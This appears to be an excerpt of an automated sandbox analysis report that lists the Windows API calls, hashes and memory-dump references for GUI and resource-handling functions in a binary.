Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ParentRectWindow$CaptureClientCursorScreen
String ID:
API String ID: 3234571238-0
Opcode ID: 96e2ae3c37189bb69ea1a4b888cfbdb3939ff64283c5d8b60d1475d94e2f2be2
Instruction ID: fcff2e25f3f5691248fd7496c20a8af5c69560a2105a2f5525760b2e3649b397
Opcode Fuzzy Hash: 96e2ae3c37189bb69ea1a4b888cfbdb3939ff64283c5d8b60d1475d94e2f2be2
Instruction Fuzzy Hash: B3114C71510648EFDB21DF64C848BEEBBF8FF48305F00455DE49A97261DB75AA40DB50

Function 00C68D61 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00000000), ref: 00C68D7E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CountItemMenu
String ID:
API String ID: 1409047151-0
Opcode ID: 83bdd40536f65592b502ad45cf0691f7efc26887fc1e53ef59de32dc93563898
Instruction ID: 2c47b34e666c1ec8158c59cd64b45163aea55140d5f4230810c90ce7513f5ce3
Opcode Fuzzy Hash: 83bdd40536f65592b502ad45cf0691f7efc26887fc1e53ef59de32dc93563898
Instruction Fuzzy Hash: 6F01D17190024BBFDB218B6ACCC4AAE7ABDFBA4784F200225F811D6190DA30DE859770

Function 00C12F7E Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C12FB9
DestroyWindow.USER32(?), ref: 00C12FD5
IsWindow.USER32(?), ref: 00C12FF4
DestroyWindow.USER32(?), ref: 00C13004

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Destroy
String ID:
API String ID: 3707531092-0
Opcode ID: de4e23d49f170660a91568351df205c19da6701831d3e9984b8477f0971d68ec
Instruction ID: 59f5015a45cc40861b08e7d1502c61cb4cd62cd9e4756da5123825843c26c651
Opcode Fuzzy Hash: de4e23d49f170660a91568351df205c19da6701831d3e9984b8477f0971d68ec
Instruction Fuzzy Hash: 1D019635104644AFE7219F24DC84BEABBF9FF41365F140129E52D86110DB35EE90EA60

Function 00BDF9BE Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 00BDF9CE
GetTopWindow.USER32(00000000), ref: 00BDFA0D
GetWindow.USER32(00000000,00000002), ref: 00BDFA2B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 7777899924b68217303d8da421bf9f5b3292ff400a6ce7d58138205b9df7f586
Instruction ID: 26f3d59970e16518baba5a3702f672f3bac64a11707f46d7c7ba68ea24d52dea
Opcode Fuzzy Hash: 7777899924b68217303d8da421bf9f5b3292ff400a6ce7d58138205b9df7f586
Instruction Fuzzy Hash: 14012D3240555BBBCF12AF909C05EEF7BBAEF49390F054062FA1655220E735C921EBA1

Function 00BD402D Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,?,00000000,00000000), ref: 00BD4053
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00BD4062
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 00BD407A
SysFreeString.OLEAUT32(?), ref: 00BD4083

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ByteCharMultiStringWide$AllocFree
String ID:
API String ID: 447844807-0
Opcode ID: de5653d82cbfbc70d6191c8c1f9ac6398eb42d042d4b53a565b5918f4eb083e2
Instruction ID: a3a86e9e45bdbbde1c651aaa40e82fa45b6f4b93da7ae7b24ca1ac36f9a1496a
Opcode Fuzzy Hash: de5653d82cbfbc70d6191c8c1f9ac6398eb42d042d4b53a565b5918f4eb083e2
Instruction Fuzzy Hash: E8016276500249FFDF119FE1DC84EAEBBBDEB443A0B148166F6188A150E371AE419B60

Function 00BDF143 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00BDF150
GetTopWindow.USER32(00000000), ref: 00BDF163

Part of subcall function 00BDF143: GetWindow.USER32(00000000,00000002), ref: 00BDF1AA

GetTopWindow.USER32(?), ref: 00BDF193

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 598fa60ba5691da6bb7fd2e81853f3d705beb51910c52c7ced7fac92fce6a9bb
Instruction ID: 93d6abdf2ce6a5fc83e14729a74470559c2fa11f96cf4205158f34113af8a45b
Opcode Fuzzy Hash: 598fa60ba5691da6bb7fd2e81853f3d705beb51910c52c7ced7fac92fce6a9bb
Instruction Fuzzy Hash: 36017C3640561BFB8F226F61CC04BAEBAA9EF927A0F0540B2FD16B5210F731D91196A1

Function 00CA8802 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000000,?), ref: 00CA883C
InflateRect.USER32(?,00000002,00000002), ref: 00CA884A
InvalidateRect.USER32(?,?,00000001,?,?,?,00CA8AE8,?), ref: 00CA8859
UpdateWindow.USER32(?), ref: 00CA8862

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$InflateInvalidateOffsetUpdateWindow
String ID:
API String ID: 222119783-0
Opcode ID: 734ef4f6687ca02350fcd6dbff9fba77fd07efc6be95784826da5763dbbabd1f
Instruction ID: b7649328eb235ce9304470ff4f6d27bcd282a661a0c6d1b8bb9a75f0d4c7d01b
Opcode Fuzzy Hash: 734ef4f6687ca02350fcd6dbff9fba77fd07efc6be95784826da5763dbbabd1f
Instruction Fuzzy Hash: 4C015A72600209AFCB00DFA8DC89FEE77B8FB49700F510164FA02EB091CA70AA04CB61

Function 00BED8CD Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,00000002,00000002), ref: 00BED909
InvalidateRect.USER32(?,?,00000001), ref: 00BED91A
UpdateWindow.USER32(?), ref: 00BED923
SetRectEmpty.USER32(?), ref: 00BED930

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyInflateInvalidateUpdateWindow
String ID:
API String ID: 3040190709-0
Opcode ID: e76c77eeebf2d8ba21809321b8e71ebde378f481efc82e04e5e82a53830409ec
Instruction ID: 73e79893d0132839fd56584047079f0b7a5429e6d0daf61aca6410a1bf0e7d9b
Opcode Fuzzy Hash: e76c77eeebf2d8ba21809321b8e71ebde378f481efc82e04e5e82a53830409ec
Instruction Fuzzy Hash: D60180B1500205AFCB10DF99DC89BDA7BBCFB09721F110275ED06EE1A6CB706A05CB60

Function 00C22999 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,?,00000001,?,?,00C22DB1), ref: 00C229B8
InvalidateRect.USER32(?,?,00000001), ref: 00C229D9
InvalidateRect.USER32(?,?,00000001,00000000), ref: 00C229FE
UpdateWindow.USER32(?), ref: 00C22A0E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: InvalidateRect$UpdateWindow
String ID:
API String ID: 488614814-0
Opcode ID: 53f9d2625a76f087c82b4c7fc78761b5dade612c704a85f994e774e985474d56
Instruction ID: 7238d0bdf4420473abab8a7b62b4ab0d47e49ff31af9d4e37091bacda1de7417
Opcode Fuzzy Hash: 53f9d2625a76f087c82b4c7fc78761b5dade612c704a85f994e774e985474d56
Instruction Fuzzy Hash: 0B010872201610EFE721DB29EC94F92B7E9BF4C310F1A0659E19997671E770EC80DB50

Function 00BE22A3 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 00BE22C9
LoadResource.KERNEL32(?,00000000), ref: 00BE22D5
LockResource.KERNEL32(00000000), ref: 00BE22E2
FreeResource.KERNEL32(00000000,00000000), ref: 00BE22FE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 9dc5fe47661dd712448762f669a79fc4f5f688d6e5e4910af2e0a226b309c062
Instruction ID: 88996dfc8fa08699f466526a78ba42a2d4f132114b36f68f1c57acd865a89e3a
Opcode Fuzzy Hash: 9dc5fe47661dd712448762f669a79fc4f5f688d6e5e4910af2e0a226b309c062
Instruction Fuzzy Hash: CFF0AF32600381AFC7255FA68CC4F6FBBECEF857A171540B9BB0696221DF74ED008A65

Function 00BE2636 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BE264B
GetParent.USER32(?), ref: 00BE265A
GetParent.USER32(?), ref: 00BE2670
SetFocus.USER32(?,00000000), ref: 00BE2686

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Parent$Focus
String ID:
API String ID: 384096180-0
Opcode ID: 2faabf26b828e0aae0d4f2ab0198d57127feee7d2d9ab4c475ada273265bfcbf
Instruction ID: 292d7b9d5e6f04af8abbf11f177948bb8552028562ff09fae82329c39cc83cb5
Opcode Fuzzy Hash: 2faabf26b828e0aae0d4f2ab0198d57127feee7d2d9ab4c475ada273265bfcbf
Instruction Fuzzy Hash: 6DF03C325007419FCB30B771EC08B5ABBE9FFC4314F4509A9E4958A261EB34E801CA10

Function 00C2AACB Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00C2AAF1
PtInRect.USER32(?,?,?), ref: 00C2AB04
SetCapture.USER32(?), ref: 00C2AB11
RedrawWindow.USER32(?,00000000,00000000,00000401,00000000), ref: 00C2AB30

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CaptureClientRectRedrawScreenWindow
String ID:
API String ID: 2178243973-0
Opcode ID: c626da4a90ed2f4d6df8b7dab8bfe34c42934b570541ba45228a607315238d9d
Instruction ID: cd1ab71fa50af15a6e45cba9bae22bbb2076079dcd63815f12309e8488c2beef
Opcode Fuzzy Hash: c626da4a90ed2f4d6df8b7dab8bfe34c42934b570541ba45228a607315238d9d
Instruction Fuzzy Hash: F301FB71500758AFDB219FA0DC49F9EBBF9FB08300F004559F55696260EB71EA40DB51

Function 00C11923 Relevance: 6.0, APIs: 4, Instructions: 38keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C1193F
GetKeyboardLayout.USER32(?), ref: 00C1195D
MapVirtualKeyA.USER32(?,00000000), ref: 00C11979
ToAsciiEx.USER32(?,00000000), ref: 00C11983

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Keyboard$AsciiException@8H_prolog3LayoutStateThrowVirtual
String ID:
API String ID: 3974856472-0
Opcode ID: 3a5c8bc0cf0bb7b70fe7e3aff0a800c3bf01f6503624e4d27c61cf7d4ccc7552
Instruction ID: 1d98ddbb5dc0f054022e763c1a7d708d75719ee1f5f70b08bded0c3e11d2cbbe
Opcode Fuzzy Hash: 3a5c8bc0cf0bb7b70fe7e3aff0a800c3bf01f6503624e4d27c61cf7d4ccc7552
Instruction Fuzzy Hash: 96013171605108AFDB109B61DD89FEE7BBCEF18740F4000A5F546D6150EE74AE84DF61

Function 00CB4F44 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 00BE2566: ShowWindow.USER32(00000000,?,?,00BDA1D1,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 00BE2577

UpdateWindow.USER32(?), ref: 00CB4F71
UpdateWindow.USER32(?), ref: 00CB4F7D
SetRectEmpty.USER32(?), ref: 00CB4F89
SetRectEmpty.USER32(?), ref: 00CB4F92

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$EmptyRectUpdate$Show
String ID:
API String ID: 1262231214-0
Opcode ID: 89b37acc50cab35468c5e331f7824d0278cb33c20ebd1555d06384d83fa501f4
Instruction ID: 1e779f0883522d5c200856191e61250cec75bb24ebfaa425b7768791fb1a91a9
Opcode Fuzzy Hash: 89b37acc50cab35468c5e331f7824d0278cb33c20ebd1555d06384d83fa501f4
Instruction Fuzzy Hash: 45F08C32204A149FE721AB76DD00BABB7E8BF90711F0A0169E1A897171CB78F901CA60

Function 00C3B873 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3B87A

Part of subcall function 00BF3B2F: __EH_prolog3.LIBCMT ref: 00BF3B36

Part of subcall function 00C80ECD: __EH_prolog3.LIBCMT ref: 00C80ED4

Part of subcall function 00CA959F: __EH_prolog3.LIBCMT ref: 00CA95A6
Part of subcall function 00CA959F: DestroyIcon.USER32(?,00000004,00C3B8B4,00000004,00C3BB33,?,?,?), ref: 00CA95C9
Part of subcall function 00CA959F: DestroyIcon.USER32(?,?,?), ref: 00CA95D1
Part of subcall function 00CA959F: DestroyIcon.USER32(?,?,?), ref: 00CA95D9
Part of subcall function 00CA959F: DestroyIcon.USER32(?,?,?), ref: 00CA95E1
Part of subcall function 00CA959F: DestroyIcon.USER32(?,?,?), ref: 00CA95E9
Part of subcall function 00CA959F: DestroyIcon.USER32(?,?,?), ref: 00CA95F1
Part of subcall function 00CA959F: ~_Task_impl.LIBCPMT ref: 00CA962B

~_Task_impl.LIBCPMT ref: 00C3B8BE

Part of subcall function 00C5D266: __EH_prolog3.LIBCMT ref: 00C5D26D

~_Task_impl.LIBCPMT ref: 00C3B8CD
~_Task_impl.LIBCPMT ref: 00C3B8DC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: DestroyIcon$H_prolog3$Task_impl
String ID:
API String ID: 537849542-0
Opcode ID: 1c5b0df63dbc53808d161152f4f58a02f10d9adebe0a230989d86efd953af05c
Instruction ID: 4e5dc6e665a4c9690dfc9d78f5d80f5c2a872acb9854a1f9c00ae9202f5d680d
Opcode Fuzzy Hash: 1c5b0df63dbc53808d161152f4f58a02f10d9adebe0a230989d86efd953af05c
Instruction Fuzzy Hash: 01F08134405785DADB26FBB4C5167DDBAA0AF25301F5046CCF99A13282DF701B08EB26

Function 00C040C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 00C03CFA: GetModuleHandleA.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00C6A7DD), ref: 00C03D71
Part of subcall function 00C03CFA: GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 00C03D81

Part of subcall function 00BEAECF: __EH_prolog3.LIBCMT ref: 00BEAED6

GetWindowRect.USER32(?,?), ref: 00C04133
SetWindowRgn.USER32(?,00000000,00000001), ref: 00C04180

Strings

, xrefs: 00C0415C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$AddressH_prolog3HandleModuleProcRect
String ID:
API String ID: 2106468464-3916222277
Opcode ID: a5d6c4edfa3662d6e1c160c433c34f0bced3fca0fa1189455a975984aa64ff80
Instruction ID: bfd08858e4bff35f211ac820682d3d6c7095dfdbc6c92317633c0b8da43cb9d5
Opcode Fuzzy Hash: a5d6c4edfa3662d6e1c160c433c34f0bced3fca0fa1189455a975984aa64ff80
Instruction Fuzzy Hash: 18515E70A00708EFCB2ADF65C8849EFBBF9FF98740F10456EE55696250DB309A40CA51

Function 00C6CA82 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C6CA8C

Part of subcall function 00C57C9D: __EH_prolog3.LIBCMT ref: 00C57CA4

Part of subcall function 00C579CF: __EH_prolog3.LIBCMT ref: 00C579D6

Strings

%sMDIClientArea-%d, xrefs: 00C6CACE
MDITabsState, xrefs: 00C6CB40

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3$H_prolog3_catch
String ID: %sMDIClientArea-%d$MDITabsState
API String ID: 1670334802-353449602
Opcode ID: 0d5ee132065cfd661560a11ead922d04e2be1b40136789e2b0ed111b4023d674
Instruction ID: 734a4769dd9339cfcc118f13e2be79c0dca0427e06c9a5d1879a1f3b543f4e2e
Opcode Fuzzy Hash: 0d5ee132065cfd661560a11ead922d04e2be1b40136789e2b0ed111b4023d674
Instruction Fuzzy Hash: 1F519C30A00249EFCF15DBA4C995BFDBBB4AF18704F144089F55AAB382DB715B44DBA2

Function 00C08059 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C080C8
SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00C08165

Strings

, xrefs: 00C080F3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: InfoParametersRectSystemWindow
String ID:
API String ID: 85510744-3916222277
Opcode ID: 82d74bb7f7d3f47e47a6b0473921852510a59f81124c6da90d8bfa9a9fae6db6
Instruction ID: e9321f2edbc13fb0f019f7edf35389fa7497dd121f9af10593937e9f6d517298
Opcode Fuzzy Hash: 82d74bb7f7d3f47e47a6b0473921852510a59f81124c6da90d8bfa9a9fae6db6
Instruction Fuzzy Hash: EE412C71900608EFCF21DFA5C884AEEBBF5FF88750F10842EE45A96250DB315A45DF50

